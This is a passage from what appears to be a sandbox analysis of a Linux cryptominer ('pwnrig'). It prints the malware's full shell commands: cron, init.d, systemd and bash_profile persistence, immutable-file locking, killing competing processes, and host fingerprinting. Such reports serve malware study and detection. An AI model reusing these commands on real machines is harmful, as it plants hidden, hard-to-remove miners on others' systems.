2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
-
-
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee 